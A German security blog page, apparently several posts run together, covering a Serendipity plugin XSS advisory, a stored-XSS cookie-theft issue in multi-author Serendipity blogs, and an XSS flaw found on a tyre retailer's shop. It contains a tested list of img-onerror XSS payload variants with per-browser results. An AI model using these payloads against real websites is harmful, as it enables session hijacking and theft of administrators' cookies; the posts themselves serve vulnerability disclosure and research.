Alex' blog

Die neue Ausgabe beinhaltet noch folgende weitere Artikel:

• Angriffserkennung über Benutzerverhalten
• Schwachstellen in Webanwendungen
• Apache Basisschutz
• IPv6 Superworm aka Teredo
• Sprachstörungen - Netzwerke unter Beschuss
• E-Mail-Sicherheit
• Advanced Encryption Standard AES
• Weiterbildung mittels Security-Zertifizierungen
• Evolution der IT-Sicherheit
• EVB-IT
• Wenn der Kunde zum König wird

Beim Durchblättern ist mir bereits aufgefallen, dass Yannick von Arx, der Autor des Artikels "Weiterbildung mittels Security-Zertifizierungen", überhaupt nicht auf Zertifizierungen zum Auditor nach ISO 27001 respektive BSI-Grundschutz eingeht.
Eigentlich schade darum, aber Zertifizierungen dieser Art sind eher weniger etwas für einen selbst. Vielleicht ist das der Grund, weshalb er diese in seinem Artikel vernachlässigt hat.

Das Advisory zur Schwachstelle gibt es hier.

Um es kurz zu machen: es gibt bereits ein Update, welches dringendst eingespielt werden sollte, sofern man das Freetag-Plugin integriert hat !
(Der aktuelle XSS-Vektor ist auf IE 6, IE 7 und Netscape Navigator 8.1 (im IE-Rendering Mode) ausgelegt.)
Ein Eintrag von Garvin Hicking befindet sich dazu hier.

Im Gegensatz zu meinen sonst rein deutschsprachigen Beiträgen hier im Blog, ist das Advisory selbstverständlich in englischer Sprache gehalten ! Es ist momentan aber noch nicht online, da es eigentlich erst für morgen geplant war.

Update: Advisory ist nun online. / Advisory is now online.
Mit einem entsprechenden Google Dork lassen sich leicht unzählige verwundbare Webseiten finden. Dieser Google Dork wird zur Sicherheit allerdings nicht veröffentlicht werden.

Update 2: CVE-Candidate: CVE-2008-0751.

<img src=. onerror=alert('XSS')>

Getestet in Firefox 2.0.0.11, Opera 9.25, Internet Explorer 7 und Safari 3.04 Beta (Windows).

Allerdings gibt es noch einige andere Varianten, die wie folgt funktionieren:

0<img src=\ onerror=alert(0)>FF2: 0 / IE7: 1 / O: 1 / S: 1
1<img src="/" onerror=alert(1)>FF2: 0 / IE7: 1 / O: 1 / S: 1
2<img src="." onerror=alert(2)>FF2: 1 / IE7: 1 / O: 1 / S: 1
3<img src="" onerror=alert(3)>FF2: 1 / IE7: 1 / O: 0 / S: 0
4<img src=. onerror=alert(4)>FF2: 1 / IE7: 1 / O: 1 / S: 1
5<img src=/ onerror=alert(5)>FF2: 0 / IE7: 1 / O: 1 / S: 1
6<img src= onerror=alert(6)>FF2: 0 / IE7: 0 / O: 0 / S: 0
7<img src onerror=alert(7)>FF2: 1 / IE7: 0 / O: 0 / S: 0
8<img onerror=alert(8)>FF2: 0 / IE7: 0 / O: 0 / S: 0
9<img src="\" onerror=alert(9)>FF2: 0 / IE7: 1 / O: 1 / S: 1(0 = funktioniert nicht; 1 = funktioniert)

In Serendipity existiert eine Schwachstelle, die sich für XSS-Angriffe nutzen lässt.

Ganz so dramatisch, wie dies jetzt klingt, ist sie allerdings nicht und dürfte wahrscheinlich auch nur wenige Serendipity-User betreffen, da hier auf mehrere Autoren im System gesetzt wird von denen mindestens ein Autor böswillige Absichten hat.
Die Schwachstelle resultiert aus einer fehlenden Bereinigung der Titel-Zeile eines entsprechend präparierten Eintrags, wenn darauf mit einem (un)moderierten Kommentar geantwortet wurde.

Da in Serendipity generell HTML- und auch JavaScript-Code erlaubt ist, ist dies eigentlich keinen Blog-Eintrag wert, da dies by design erlaubt ist und somit als Feature und nicht als Bug verstanden werden soll.

Wer aber zusammen mit anderen Autoren in einem Blog Einträge verfasst (egal ob in diesem Blog zur Sicherheit das Event-Plugin "XSSTrust" eingesetzt wird oder nicht), kann auf diese Weise an gültige Cookies anderer Autoren oder gar des Administrators gelangen.

Ein böswilliger Autor erstellt einen neuen Eintrag mit bspw. dem folgenden Titel:

Wenn dieser Autor danach einen Kommentar zu seinem Eintrag verfasst und später ein anderer Autor oder gar ein Administrator auf die "Kommentare"-Seite in der Serendipity-Verwaltungsoberfläche geht, so wird dessen Cookie in einer Dialogbox des Webbrowsers angezeigt. (Natürlich ließe sich der Cookie auch an der Angreifer hinschicken o.ä. ...)

Seit heute bin ich stolzer Besitzer eines neuen Buches: "The Web Application Hacker's Handbook" (ISBN-13: 978-0470170779). Geschrieben von den beiden Autoren Dafydd Stuttard und Marcus Pinto.

Ich bin gespannt auf das, was mir in den letzten Jahren u.U. entgangen sein sollte. Hoffentlich nicht viel.

Update: Komplett durchgelesen habe ich das Buch bisher zwar noch nicht, aber es fehlt definitiv die Erwähnung der Header "Range" und "Request-Range". Schließlich lässt sich mit letzterem einiges anstellen.

1. (fast) alle unterschiedlicher Marke sind;
2. über sechs Jahre alt sind;
3. teilweise einen Riss haben;
4. ein Profil von nur noch ca. 2 mm haben, sofern ich dies das letztes Mal beim TÜV richtig gehört habe.

Geplant war das für diesen Winter sowieso. Und dank Weihnachten kann ich mir das auch endlich leisten. Das es jetzt auf Winterreifen auch noch Rabatt gibt, kommt mir zudem entgegen.

Bislang eigentlich noch kein Grund, um dies als Beitrag in die Kategorie "IT-Security" zu stellen oder überhaupt zu veröffentlichen. Dieser folgt aber sogleich:

Und zwar habe ich bei meiner Reifen-Recherche bei A.T.U ein (ganz triviales) XSS-Problem festgestellt. Da es auf der Webseite einen Online-Shop gibt, ist das natürlich schon interessanter. Mal sehen, ob ich noch mehr Rabatt auf meinen Reifeneinkauf bekomme, wenn ich vor Ort entsprechende Hinweise loswerde.